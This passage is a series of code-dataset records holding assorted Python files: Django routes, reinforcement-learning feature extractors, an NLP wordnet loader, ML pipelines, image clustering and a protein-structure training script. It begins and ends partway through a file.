  \t\t\t .pivot(index = 'shortname', columns = 'type', values = 'filename') \\\n    \t\t\t .sort_index(axis = 1, key = lambda x: x.map(order))\n\n    outputTable = checkDf(finalTable)\n\n    data = outputTable.values\n    logger.info(f\"Added these files to HMAS QC batch file: {data}\")\n    outfile = os.path.abspath(args.directory) + '/' + args.prefix + '.paired.files'\n    logger.info(f\"Saving output to: {outfile}\")\n    np.savetxt(outfile, data, delimiter = '\\t', fmt = '%s')\n\n    logger.info(f\"Completed. Please make sure {outfile} is correct before continuing.\") \n\n","repo_name":"jessicarowell/HMAS-QC-Pipeline","sub_path":"make_file.py","file_name":"make_file.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"37812653815","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.home, name=\"home\"),\n path(\"list\", views.list, name=\"list\"),\n path(\"list/\", views.get_vegetable, name=\"get_vegetable\"),\n path(\"forecast\", views.forecast, name=\"forecast\"),\n path(\"todays-tasks\", views.todays_tasks, name=\"todays-tasks\"),\n]\n","repo_name":"toquothty/garden-planner-django","sub_path":"config/garden/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14141264443","text":"import numpy as np\n\nfrom discretizer import GridDiscretizer\nfrom misc import Cropper, ClipRange, MinMaxScaler, ToTensor\n\ntry:\n import torch\n from autoencoders.autoencoders import AutoEncoder, VAE, DiscreteLatentVAE, VectorQuantizedVAE, GumbelVAE\nexcept ImportError:\n pass\n\n\nMAX_RANGE = 16.0\nMIN_RANGE = 0.3\nCLIP_RANGE = 2.0\nLEVELS = 4\nSIZE = 4\nGRIDS = 1\n\n\nclass FeaturesMixin(object):\n def __init__(self,\n size = SIZE,\n crop = None,\n **kwargs):\n self.size = size\n self.cropper = Cropper(crop)\n\n def __call__(self, x):\n z = self.get_features(x)\n return z\n\n def sample(self):\n try:\n z_sample = np.random.randn(self.levels, size=self.size)\n except:\n z_sample = np.random.randn(self.size)\n return z_sample\n\n\nclass GridFeatures(FeaturesMixin):\n def __init__(self,\n levels=LEVELS,\n size=SIZE,\n crop=None,\n min_range=MIN_RANGE,\n max_range=MAX_RANGE,\n clip_range=CLIP_RANGE,\n **kwargs):\n super(GridFeatures, self).__init__(size=size, crop=crop)\n self.grid = GridDiscretizer(randomize_bins=False,\n levels=levels,\n size=size,\n enumerate=False,\n crop=crop,\n min_range=min_range,\n max_range=max_range,\n clip_range=clip_range)\n\n def get_features(self, x):\n z = self.grid(x)\n return z\n\n\nclass TileCodingFeatures(FeaturesMixin):\n def __init__(self,\n grids=GRIDS,\n levels=LEVELS,\n size=SIZE,\n crop=None,\n min_range=MIN_RANGE,\n max_range=MAX_RANGE,\n clip_range=CLIP_RANGE,\n **kwargs):\n super(TileCodingFeatures, self).__init__(size=size, crop=crop)\n self.size = levels**size\n self.grids = [GridDiscretizer(randomize_bins=i,\n levels=levels,\n size=size,\n enumerate=True,\n crop=crop,\n min_range=min_range,\n max_range=max_range,\n clip_range=clip_range) for i in range(grids)]\n\n def get_features(self, x):\n z = np.zeros(self.size)\n for i, grid in enumerate(self.grids):\n z[grid(x)] += 1.0\n return z\n\n\nclass AEFeatures(FeaturesMixin):\n def __init__(self,\n path,\n levels=LEVELS,\n size=SIZE,\n crop=None,\n min_range=MIN_RANGE,\n max_range=MAX_RANGE,\n clip_range=CLIP_RANGE,\n **kwargs):\n super(AEFeatures, self).__init__(size=size, crop=crop)\n self.model = torch.load(path, map_location=lambda storage, loc: storage).eval()\n\n if isinstance(self.model, VectorQuantizedVAE):\n size = self.model.n_latents\n levels = self.model.categorical_dim\n elif isinstance(self.model, GumbelVAE):\n size = self.model.latent_dim\n levels = self.model.categorical_dim\n elif isinstance(self.model, AutoEncoder):\n size = self.model.latent_dim\n else:\n raise ValueError(\"Model can only be either VQ-VAE or Gumbel-VAE.\")\n\n assert self.size == size, \"Loaded model latent size ({}) not consistent with feature size ({})\".format(size, self.size)\n if isinstance(self.model, DiscreteLatentVAE):\n assert kwargs[\"levels\"] == levels, \"Loaded model categorical dimension ({}) not consistent with provided feature levels ({})\".format(levels, kwargs[\"levels\"])\n assert int(self.cropper.size*2.0) == 
self.model.input_dim, \"Loaded model input dimension ({}) not consistent with feature input dimension ({})\".format(self.model.input_dim, int(self.cropper.size*2.0))\n\n        self.clipper = ClipRange(clip=clip_range, maximum=max_range)\n        self.scaler = MinMaxScaler(clip=clip_range, maximum=max_range)\n        self.torcher = ToTensor()\n\n    def get_features(self, x):\n        x_cropped = self.cropper(x)\n        x_clipped = self.clipper(x_cropped)\n        x_scaled = self.scaler(x_clipped)\n        x_tensor = self.torcher(x_scaled)\n        if isinstance(self.model, VAE):\n            z, _ = self.model.encode(x_tensor)\n        elif isinstance(self.model, AutoEncoder):\n            z = self.model.encode(x_tensor)\n        return z.detach().numpy().reshape(self.size)\n\n\n###################### REMEMBER TO CHANGE RACHID'S CODE TO A PROPER CLASS HERE !!!!!!!!!!!!!!!!!!!!!\nclass RandomFeatures(FeaturesMixin):\n    def __init__(self, **kwargs):\n        super(RandomFeatures, self).__init__(**kwargs)\n\n    def get_features(self, x):\n        z = x\n        return z\n\n\nclass Features(FeaturesMixin):\n    def __init__(self, features_type, **kwargs):\n        super(Features, self).__init__(**kwargs)\n        self.features_type = features_type\n\n        if self.features_type == 'grid':\n            self.feat = GridFeatures(**kwargs)\n        elif self.features_type == 'tile':\n            self.feat = TileCodingFeatures(**kwargs)\n        elif self.features_type == 'autoencoder':\n            self.feat = AEFeatures(**kwargs)\n        elif self.features_type == 'rand':\n            self.feat = RandomFeatures(**kwargs)\n        else:\n            raise ValueError(\"features_type can be grid, tile, autoencoder or rand, but got {} instead.\".format(self.features_type))\n\n        self.size = self.feat.size\n\n    def get_features(self, x):\n        return self.feat.get_features(x)\n","repo_name":"uzairakbar/rl-obstacle-avoidance","sub_path":"src/rl_tb_lidar/src/utils/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"67"} +{"seq_id":"40445625877","text":"import random\n\nk = input(\"Enter a number:\")\nk = int(k)\ntotal = 0\nfor i in range(0, k):\n\ttotal += random.randrange(0, 999) + 1\n\t\nprint(\"The Average was\", end = ' ')\nprint(format(total/k, \"5.2f\"), end = '.')","repo_name":"rayman456/Python","sub_path":"Lab3Ex3.py","file_name":"Lab3Ex3.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74875859412","text":"from enum import Enum\n\nclass RobotRunnerEvents(Enum):\n    BEFORE_EXPERIMENT = 1\n    BEFORE_RUN = 2\n    START_RUN = 3\n    START_MEASUREMENT = 4\n    LAUNCH_MISSION = 5\n    CONTINUE = 6\n    STOP_MEASUREMENT = 7\n    STOP_RUN = 8\n    POPULATE_RUN_DATA = 9\n    AFTER_EXPERIMENT = 10","repo_name":"S2-group/robot-runner","sub_path":"robot-runner/EventManager/Models/RobotRunnerEvents.py","file_name":"RobotRunnerEvents.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"67"} +{"seq_id":"71666669335","text":"from collections import defaultdict\n\nimport pandas\nfrom nltk.corpus import wordnet as wn\n\nimport wn_utils\n\n\nnaf_pos_to_wn_pos = {\n    'N' : 'n',\n    'V' : 'v',\n    'G' : 'a',\n    'A' : 'r'\n    }\n\nclass Token:\n    def __init__(self, token_id, text, pos=None, lemma=None):\n        self.token_id = token_id\n        self.text = text\n        self.pos = pos\n        self.lemma = lemma\n\n\nclass NAF:\n\n\n    def __init__(self,\n                 doc,\n                 naf_pos_to_consider={'N', 'V', 'G', 'A'},\n                 use_pos_in_candidate_selection=True,\n                 wn_version='30',\n                 verbose=0,\n                 ):\n        self.naf_pos_to_consider = 
naf_pos_to_consider\n        self.use_pos_in_candidate_selection = use_pos_in_candidate_selection\n        self.verbose = verbose\n\n        self.doc_name = self.get_doc_name(doc)\n\n        self.sentid2token_objs = self.load_sentid2token_objs(doc)\n\n        self.df = self.create_df(wn_version)\n\n    def __str__(self):\n        info = []\n\n        attrs = ['doc_name']\n\n        for attr in attrs:\n            info.append('KEY: %s: %s' % (attr, getattr(self, attr)))\n\n        return '\\n'.join(info)\n\n\n    def get_doc_name(self, doc):\n        return doc.find('nafHeader/fileDesc').get('title')\n\n\n    def load_sentid2token_objs(self, doc):\n        \"\"\"\n\n        :param lxml.etree._ElementTree doc: NAF file loaded with etree.parse()\n\n        :rtype: dict\n        :return: mapping of sent_id -> list of Token objs\n        \"\"\"\n\n        sentid2token_objs = defaultdict(list)\n\n        wf_els = doc.xpath('text/wf')\n        term_els = doc.xpath('terms/term')\n\n        # for now, I assume that NAF files should have the same number of wf and term elements\n        assert len(wf_els) == len(term_els), 'mismatch in number of wf and term elements'\n\n        ignored_pos = set()\n        for wf_el, term_el in zip(wf_els, term_els):\n            token_id = term_el.get('id')\n            text = wf_el.text\n            lemma = term_el.get('lemma')\n            sent_id = int(wf_el.get('sent'))\n\n            naf_pos = term_el.get('pos')\n            if naf_pos not in self.naf_pos_to_consider:\n                ignored_pos.add(naf_pos)\n\n            wn_pos = naf_pos_to_wn_pos.get(naf_pos, None)\n\n            if wn_pos is None:\n                if self.verbose >= 3:\n                    print('could not map %s to a wordnet pos' % naf_pos)\n\n            token_obj = Token(token_id=token_id,\n                              text=text,\n                              pos=wn_pos,\n                              lemma=lemma)\n            sentid2token_objs[sent_id].append(token_obj)\n\n\n        if self.verbose >= 2:\n            print('skipped pos labels: %s' % ignored_pos)\n            print('found %s sentences' % len(sentid2token_objs))\n\n        return sentid2token_objs\n\n\n    def create_df(self, wn_version):\n\n\n        list_of_lists = []\n        headers = ['doc_name', 'pos',\n                   'sentence', 'sentence_tokens',\n                   'target_lemma', 'token',\n                   'token_ids',\n                   'candidate_meanings']\n\n        for sent_id, token_objs in self.sentid2token_objs.items():\n\n            sentence = ' '.join([token_obj.text\n                                 for token_obj in token_objs])\n\n            for token_obj in token_objs:\n\n                if self.use_pos_in_candidate_selection:\n                    if not token_obj.pos:\n                        continue\n\n                # TODO: precompute\n                if self.use_pos_in_candidate_selection:\n                    the_pos = token_obj.pos\n                else:\n                    the_pos = None\n                synsets = wn_utils.candidate_selection(wn=wn,\n                                                       token=token_obj.text,\n                                                       target_lemma=token_obj.lemma,\n                                                       pos=the_pos)\n                synset_identifiers = [wn_utils.synset2identifier(synset, wn_version)\n                                      for synset in synsets]\n\n\n                if synset_identifiers:\n                    one_row = [self.doc_name,\n                               token_obj.pos,\n                               sentence,\n                               token_objs,\n                               token_obj.lemma,\n                               token_obj.text,\n                               [token_obj.token_id],\n                               synset_identifiers]\n                    list_of_lists.append(one_row)\n\n\n        df = pandas.DataFrame(list_of_lists, columns=headers)\n        return df\n\nif __name__ == '__main__':\n    import pickle\n    from lxml import etree\n    from datetime import datetime\n\n    import naf_utils\n    from utils import time_in_correct_format\n\n    start_time = time_in_correct_format(datetime.now())\n\n    # load NAF\n    doc = etree.parse('example_files/World Chess Championship 1984.naf')\n    naf_obj = NAF(doc, verbose=2)\n\n    # TODO: process with BERT\n\n    end_time = time_in_correct_format(datetime.now())\n\n    naf_utils.add_wsd_header(doc,\n                             start_time=start_time,\n                             end_time=end_time\n                             )\n\n    with open('example_files/test.df', 'wb') as outfile:\n        pickle.dump(naf_obj.df, outfile)\n    # TODO: enrich 
NAF\n\n\n\n\n","repo_name":"cltl/BERT-WSD","sub_path":"wsd_datasets_classes.py","file_name":"wsd_datasets_classes.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8757883042","text":"import sqlalchemy\nfrom contextlib import contextmanager\nfrom . import _base, _engines, _sessions\n# The models module needs to be imported before create_all\nfrom .models import *\n\n\n__all__ = [\n    'session_scope',\n    'init_database',\n    'describe_table'\n]\n\n\n@contextmanager\ndef session_scope(db='default'):\n    session = _sessions.get(db)()\n    try:\n        yield session\n        session.commit()\n    except:\n        session.rollback()\n        raise\n    finally:\n        session.close()\n\n\ndef init_database(db='default', drop_all=False):\n    engine = _engines.get(db)\n    if drop_all:\n        _base.metadata.drop_all(engine)\n    _base.metadata.create_all(engine)\n\n\ndef describe_table(table, db='default'):\n    engine = _engines.get(db)\n    assert engine.has_table(table), \"Table does not exist\"\n    inspect = sqlalchemy.inspect(engine)\n    return {\n        'columns': inspect.get_columns(table),\n        'check_constraints': inspect.get_check_constraints(table),\n        'foreign_keys': inspect.get_foreign_keys(table),\n        'indexes': inspect.get_indexes(table),\n        'pk_constraint': inspect.get_pk_constraint(table),\n        'primary_keys': inspect.get_primary_keys(table),\n        'table_comment': inspect.get_table_comment(table),\n    }\n","repo_name":"travishen/sqlalchemy-oracle-template","sub_path":"src/app/database/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36266689221","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom imblearn.over_sampling import RandomOverSampler\n\ndef classifier_pipeline(data: pd.DataFrame, target_var: str, classifier, cv_grid: dict, oversampler=RandomOverSampler()):\n    \"\"\"\n    creates a random forest pipeline for classification\n\n    Params: \n        data: pandas data frame used for classification\n        target_var: variable name for target var\n        classifier: provided classifier for pipeline\n        cv_grid: parameter grid for cross validation\n\n    Returns: \n        best_mod: best model chosen from cross validation\n        X_test: feature data used for testing\n        y_test: target data used for testing\n        y_train: target data used for training\n    \"\"\"\n    \n    from sklearn.model_selection import train_test_split, RandomizedSearchCV\n    from sklearn.preprocessing import MinMaxScaler, OneHotEncoder\n    from imblearn.pipeline import Pipeline\n    from sklearn.experimental import enable_iterative_imputer\n    from sklearn.impute import IterativeImputer, SimpleImputer\n    from sklearn.compose import ColumnTransformer\n    \n    data = data.copy()\n    data.dropna(subset=(target_var), inplace=True)\n    X = data.drop(target_var, axis=\"columns\")\n    y = data[target_var]\n    \n    X_train, X_test, y_train, y_test = train_test_split(X, y,\n                                                    train_size=.8, \n                                                    random_state=117)\n    \n    num_cols = list(data.select_dtypes(include=\"float64\").columns)\n    cat_cols = list(data.select_dtypes(include=\"object\").columns)\n    cat_cols.remove(target_var)\n    \n    num_pipe = Pipeline(steps=[(\"it_impu\", IterativeImputer()), \n                               (\"min_max\", MinMaxScaler())])\n    cat_pipe = Pipeline(steps=[(\"cat_impu\", SimpleImputer(strategy=\"most_frequent\")),\n                               ('encoder', OneHotEncoder(handle_unknown=\"ignore\"))])\n    \n    col_t = ColumnTransformer([(\"num_transform\", num_pipe, num_cols), \n                               ('cat_transform', cat_pipe, 
cat_cols)])\n    \n    \n    class_pipe = Pipeline(steps=[(\"col_trans\", col_t),\n                                 (\"samp\", oversampler),\n                                 (\"class\", classifier)])\n    \n    grid_clf = RandomizedSearchCV(estimator=class_pipe, \n                                  param_distributions=cv_grid,\n                                  scoring=\"accuracy\", cv=10, \n                                  verbose=False)\n    grid_clf.fit(X_train, y_train)\n    best_mod = grid_clf.best_estimator_\n    best_mod.fit(X_train, y_train)\n    return best_mod, X_test, y_test, y_train\n\n\n","repo_name":"Christheoneoneil/csys395_final","sub_path":"classifier_pipe.py","file_name":"classifier_pipe.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26666523212","text":"'''Script for image clustering using CNNs.\n\nUsage:\n    python image_clustering.py .yaml\n\nAuthor:\n    Cedric Basuel\n\n'''\n\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport sys\nimport os\nimport yaml\nimport time\nimport logging\nfrom functools import wraps\nfrom sklearn.cluster import KMeans\nimport pandas as pd\n\n\nlogging.basicConfig(\n    # filename='train_image.log',\n    format='[IMAGE_CLUSTERING] %(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', \n    level=logging.DEBUG\n    )\n\ndef timer(func):\n    @wraps(func)\n    def wrapper_time(*args, **kwargs):\n        start_time = time.time()\n        value = func(*args, **kwargs)\n        run_time = time.time() - start_time\n        logging.info('{} took {} seconds to finish.'.format(func.__name__, run_time))\n        return value\n    return wrapper_time\n\n@timer\ndef load_images(dir, target_size, labelmap):\n    '''Load train/test images from a directory.\n\n    Params\n    ------\n    dir : str\n        Where images will be loaded from.\n\n    Returns\n    -------\n    image_list : ndarray\n        List of raw images.\n    \n    label_list : ndarray\n        Label list for each image, mapped to integer labels.\n\n    '''\n    \n    image_list = []\n    label_list = []\n    logging.info('Loading images from {}...'.format(dir))\n    for root, dirs, files in os.walk(dir):\n        for file in files:\n            temp_dir = str.split(root, '/') \n            try:\n                temp_image = cv2.imread(os.path.join(root, file))\n                temp_image = cv2.cvtColor(temp_image, cv2.COLOR_BGR2RGB)\n                temp_image = cv2.resize(temp_image, dsize=target_size)\n                image_list.append(temp_image)\n                label_list.append(file) \n            except cv2.error:\n                pass\n\n    image_list = np.array(image_list)\n    return image_list, label_list\n\n@timer\ndef get_embedding(image_list, model_name, image_shape, model_loaded=True):\n    '''Use a pretrained CNN model to get features from an image.\n\n    Params\n    ------\n    image_list : ndarray\n        List of raw images from load_images.\n\n    model_name : str\n        Name of CNN model.\n\n    image_shape : tuple\n        Dimensions of image.\n\n    model_loaded : bool\n        True if model is preloaded in env, otherwise load CNN model from scratch.\n\n    Returns\n    -------\n    emb_list : ndarray\n        Extracted image features.\n\n    '''\n    logging.info('Getting image embeddings...')\n    logging.info(model_name)\n\n    emb_list = []\n    model = model_name\n\n    if not model_loaded:\n        if model_name=='mobilenet':\n            model = tf.keras.applications.MobileNetV2(\n                weights='imagenet',\n                include_top=True, ### wait, should this be True? I'm confused\n                input_shape=image_shape,\n                layers=tf.keras.layers\n            ) \n        elif model_name=='resnet50':\n            model = tf.keras.applications.ResNet50(\n                weights='imagenet', \n                include_top=True, \n                input_shape=image_shape\n            )\n        else: \n            raise ValueError('Model not yet available.')\n\n        logging.info('Successfully loaded model.')\n\n\n    for img in image_list:\n        img = np.expand_dims(img, axis=0)\n        temp_emb = model.predict(img)\n        emb_list.append(np.squeeze(temp_emb))\n    \n    logging.info('Successfully extracted embeddings.')\n    \n    return image_list, np.array(emb_list)\n\n@timer\ndef cluster_images(image_list, emb_list, num_clusters):\n    '''Use kmeans clustering to obtain clusters of images\n    given n-dimensional embeddings from get_embedding().\n\n    Params\n    ------\n    emb_list : ndarray\n        Embeddings extracted from each image.\n\n    num_clusters: int\n        Number of clusters to fit.\n\n    Returns\n    -------\n    clustered_images : list\n        List of integers indicating cluster membership for each image.\n\n    '''\n    kmodel = KMeans(n_clusters=num_clusters, n_jobs=-1)\n\n    logging.info(num_clusters)\n    logging.info(emb_list.shape)\n\n    kmodel.fit(emb_list)\n    logging.info('KMeans clustering done.')\n\n    clustered_images = kmodel.predict(emb_list)\n\n    return clustered_images\n\n\n\n\nif __name__=='__main__':\n\n    logging.info('Loading configs...')\n    CONFIG_FILE = sys.argv[1]\n\n    with open(CONFIG_FILE) as cfg:\n        config = yaml.safe_load(cfg)\n\n    logging.info('Configuring GPU...')\n    gpus = tf.config.experimental.list_physical_devices('GPU')\n    if gpus:\n        try:\n            tf.config.experimental.set_virtual_device_configuration(\n                gpus[0],\n                [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=config['training']['gpu_mem'])])\n            logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n            print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPUs\")\n        except RuntimeError as e:\n            pass\n\n    image_list, label_list = load_images(dir=config['training']['dir'],\n                            target_size=(config['training']['image_shape'], config['training']['image_shape']),\n                            labelmap=config['training']['labels']\n                            )\n\n    image_list, emb_list = get_embedding(image_list=image_list,\n                            model_name=config['training']['model_name'],\n                            image_shape=(config['training']['image_shape'], config['training']['image_shape'], 3),\n                            model_loaded=False\n                            )\n\n    logging.info(emb_list.shape)\n\n    clustered_images = cluster_images(image_list=image_list, \n                            emb_list=emb_list, \n                            num_clusters=config['training']['num_clusters']\n                            )\n    \n    logging.info('Done! 
')\n df = pd.DataFrame({'Image' : label_list, 'Cluster' : clustered_images})\n\n print(df)","repo_name":"cedricbasuel/image-clustering","sub_path":"image_clustering.py","file_name":"image_clustering.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22069111395","text":"import numpy as np\nimport scipy.stats as stats\nfrom ..distribution import Distribution\n\nclass GaussianParameterProcess(Distribution):\n\n def __init__(self, mu0, sigma0, sigmat, sigma, eta=0.9):\n self.parameters = {}\n self.mu0, self.sigma0 = mu0, sigma0\n self.sigmat = sigmat\n self.sigma = sigma\n\n self.sigma0inv = np.linalg.inv(self.sigma0)\n self.sigmatinv = np.linalg.inv(self.sigmat)\n self.sigmainv = np.linalg.inv(self.sigma)\n self.eta = eta\n\n self.sigma0inv_mu0 = np.dot(self.sigma0inv, self.mu0)\n\n def generate(self, parameter=None):\n if parameter is None:\n parameter = self.mu0\n return stats.multivariate_normal(mean=self.eta * parameter, cov=self.sigma0).rvs()\n\n def prior_log_likelihood(self, x):\n return stats.multivariate_normal(mean=self.mu0, cov=self.sigma0).logpdf(x)\n\n def transition_log_likelihood(self, mu1, mu2):\n return stats.multivariate_normal(mean=self.eta * mu1, cov=self.sigmat).logpdf(mu2)\n\n def data_log_likelihood(self, x, mu):\n return stats.multivariate_normal(mean=mu, cov=self.sigma).logpdf(x)\n\n def sample_one(self, parameter):\n return stats.multivariate_normal(mean=parameter, cov=self.sigma).rvs()\n\n def sample_posterior(self, data, children, parent):\n Nd, _ = data.shape\n if len(children.shape) == 1:\n Nc = 0\n else:\n Nc, _ = children.shape\n\n sigma0inv = self.sigma0inv\n sigma0inv_mu0 = self.sigma0inv_mu0\n if parent is not None:\n sigma0inv = self.sigmatinv\n sigma0inv_mu0 = np.dot(self.sigmatinv, self.eta * parent)\n\n sigman = np.linalg.inv(sigma0inv + Nd * self.sigmainv + Nc * self.sigmatinv)\n children_mean = 0\n if Nc > 0:\n children_mean = np.dot(self.sigmatinv, children.sum(axis=0))\n mun = np.dot(sigman, sigma0inv_mu0 +\n np.dot(self.sigmainv, data.sum(axis=0)) +\n children_mean)\n return stats.multivariate_normal(mean=mun, cov=sigman).rvs()\n","repo_name":"sharadmv/trees","sub_path":"trees/tssb/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"14227110477","text":"def torusdbn_Q_accuracy(batch):\n y = batch[\"model_output\"]\n y_argmax = np.argmax(y, 1)\n predictions = batch[\"torusdbn\"]\n identical = (predictions == y_argmax)\n return np.mean(identical), identical\n\ndef pssm_Q_accuracy(batch):\n y = batch[\"model_output\"]\n y_argmax = np.argmax(y, 1)\n predictions = batch[\"pssm\"]\n identical = (np.argmax(predictions, 1) == y_argmax)\n return np.mean(identical), identical\n\ntorus_skip_list = [\"5COY_\", \"4Y9I_\", \"4YSL_\", \"5HZ7_\", \"5KVC_\", \"5A9P_\"]\n\nif __name__ == '__main__':\n import glob\n import os\n import numpy as np\n from Deepfold.Models import models\n from Deepfold.batch_factory import BatchFactory\n from utils import str2bool\n\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--high-res-input-dir\", dest=\"high_res_features_input_dir\",\n help=\"Location of input files containing high-res features\")\n parser.add_argument(\"--test-set-fraction\",\n help=\"Fraction of data set aside for testing (default: %(default)s)\", type=float, default=0.25)\n 
parser.add_argument(\"--validation-set-size\",\n help=\"Size of validation set (taken out of training set) (default: %(default)s)\", type=int, default=10)\n parser.add_argument(\"--optimize-using-lbfgs\", action=\"store_true\",\n help=\"Whether to use the LBFGS optimizer\")\n parser.add_argument(\"--num-passes\",\n help=\"Number of passes over the data during traning (default: %(default)s)\", type=int, default=10)\n parser.add_argument(\"--max-batch-size\",\n help=\"Maximum batch size used during training (default: %(default)s)\", type=int, default=1000)\n parser.add_argument(\"--subbatch-max-size\",\n help=\"Maximum batch size used for gradient calculation (default: %(default)s)\", type=int, default=25)\n parser.add_argument(\"--model-checkpoint-path\",\n help=\"Where to dump/read model checkpoints (default: %(default)s)\", default=\"models\")\n parser.add_argument(\"--max-to-keep\",\n help=\"Maximal number of checkpoints to keep (default: %(default)s)\", type=int, default=2)\n parser.add_argument(\"--read-from-checkpoint\", action=\"store_true\",\n help=\"Whether to read model from checkpoint\")\n parser.add_argument(\"--mode\", choices=['train', 'test'], default=\"train\", \n help=\"Mode of operation (default: %(default)s)\")\n parser.add_argument(\"--model-output-type\", choices=['aa', 'ss'], default=\"ss\", \n help=\"Whether the model should output secondary structure or amino acid labels (default: %(default)s)\")\n parser.add_argument(\"--dropout-keep-prob\", type=float, default=0.5, \n help=\"Probability for leaving out node in dropout (default: %(default)s)\")\n parser.add_argument(\"--learning-rate\",\n help=\"Learing rate for Adam (default: %(default)s)\", type=float, default=0.001)\n parser.add_argument(\"--reg-fact\",\n help=\"Regularisation factor (default: %(default)s)\", type=float, default=0.001)\n parser.add_argument(\"--output-interval\",\n help=\"The output interval for train and validation error (default: %(default)s)\", type=int, default=None)\n parser.add_argument(\"--model\", choices=list(models.keys()), default=\"CubedSphereModel01\",\n help=\"Which model definition to use (default: %(default)s)\")\n parser.add_argument(\"--torusdbn-prediction-input-dir\", dest=\"torusdbn_prediction_input_dir\",\n help=\"Add torusdbn aa and ss predictions to the batch factory. In test mode, comparisons to torusdbn will be printed\")\n parser.add_argument(\"--pssm-input-dir\", dest=\"pssm_input_dir\",\n help=\"Add evolutionary AA pssm information. 
In test mode, comparisons to this pssm will be printed\")\n parser.add_argument(\"--step\", type=int, default=None,\n help=\"Which checkpoint file to use (default: %(default)s)\")\n parser.add_argument(\"--duplicate-origin\",\n type=str2bool, nargs='?', const=True, default=\"True\",\n help=\"Whether to duplicate the atoms in all bins at the origin for the spherical model\")\n \n options = parser.parse_args()\n\n print(\"# Options\")\n for key, value in sorted(vars(options).items()):\n print(key, \"=\", value)\n\n high_res_protein_feature_filenames = sorted(glob.glob(os.path.join(options.high_res_features_input_dir, \"*protein_features.npz\")))\n high_res_grid_feature_filenames = sorted(glob.glob(os.path.join(options.high_res_features_input_dir, \"*residue_features.npz\")))\n\n train_start = 0\n validation_end = test_start = int(len(high_res_protein_feature_filenames)*(1.-options.test_set_fraction))\n train_end = validation_start = int(validation_end-options.validation_set_size)\n test_end = len(high_res_protein_feature_filenames)\n\n print(\"# Data:\")\n print(\"Total size: \", len(high_res_protein_feature_filenames))\n print(\"Training size: \", train_end - train_start)\n print(\"Validation size: \", validation_end - validation_start)\n print(\"Test size: \", test_end - test_start)\n \n if options.mode == 'train':\n batch_factory = BatchFactory()\n batch_factory.add_data_set(\"high_res\",\n high_res_protein_feature_filenames[:train_end],\n high_res_grid_feature_filenames[:train_end],\n duplicate_origin=options.duplicate_origin)\n batch_factory.add_data_set(\"model_output\",\n high_res_protein_feature_filenames[:train_end],\n key_filter=[options.model_output_type+\"_one_hot\"])\n\n validation_batch_factory = BatchFactory()\n validation_batch_factory.add_data_set(\"high_res\",\n high_res_protein_feature_filenames[validation_start:validation_end],\n high_res_grid_feature_filenames[validation_start:validation_end],\n duplicate_origin=options.duplicate_origin)\n validation_batch_factory.add_data_set(\"model_output\",\n high_res_protein_feature_filenames[validation_start:validation_end],\n key_filter=[options.model_output_type+\"_one_hot\"])\n elif options.mode == 'test':\n batch_factory = BatchFactory()\n batch_factory.add_data_set(\"high_res\",\n high_res_protein_feature_filenames[test_start:],\n high_res_grid_feature_filenames[test_start:],\n duplicate_origin=options.duplicate_origin)\n batch_factory.add_data_set(\"model_output\",\n high_res_protein_feature_filenames[test_start:],\n key_filter=[options.model_output_type+\"_one_hot\"])\n\n if options.torusdbn_prediction_input_dir:\n torusdbn_feature_filenames = []\n for filename in high_res_protein_feature_filenames:\n basename = os.path.basename(filename)\n if not basename[:5] in torus_skip_list:\n torusdbn_feature_filenames.append(os.path.join(options.torusdbn_prediction_input_dir, basename))\n batch_factory.add_data_set(\"torusdbn\",\n torusdbn_feature_filenames[test_start:test_end],\n key_filter=[options.model_output_type])\n if options.pssm_input_dir:\n pssm_feature_filenames = []\n for filename in high_res_protein_feature_filenames:\n basename = os.path.basename(filename)\n pssm_feature_filenames.append(os.path.join(options.pssm_input_dir, basename))\n batch_factory.add_data_set(\"pssm\",\n pssm_feature_filenames[test_start:test_end],\n key_filter=[\"pssm\"])\n\n high_res_grid_size = batch_factory.next(1, increment_counter=False)[0][\"high_res\"].shape\n output_size = batch_factory.next(1, 
increment_counter=False)[0][\"model_output\"].shape[1]\n\n    if options.model.startswith(\"Spherical\"):\n        model = models[options.model](r_size_high_res = high_res_grid_size[1],\n                                      theta_size_high_res = high_res_grid_size[2],\n                                      phi_size_high_res = high_res_grid_size[3],\n                                      channels_high_res = high_res_grid_size[4],\n                                      output_size = output_size,\n                                      optimize_using_lbfgs = options.optimize_using_lbfgs,\n                                      reg_fact = options.reg_fact,\n                                      learning_rate = options.learning_rate,\n                                      model_checkpoint_path = options.model_checkpoint_path,\n                                      max_to_keep = options.max_to_keep)\n    elif options.model.startswith(\"CubedSphere\"):\n        model = models[options.model](patches_size_high_res = high_res_grid_size[1],\n                                      r_size_high_res = high_res_grid_size[2],\n                                      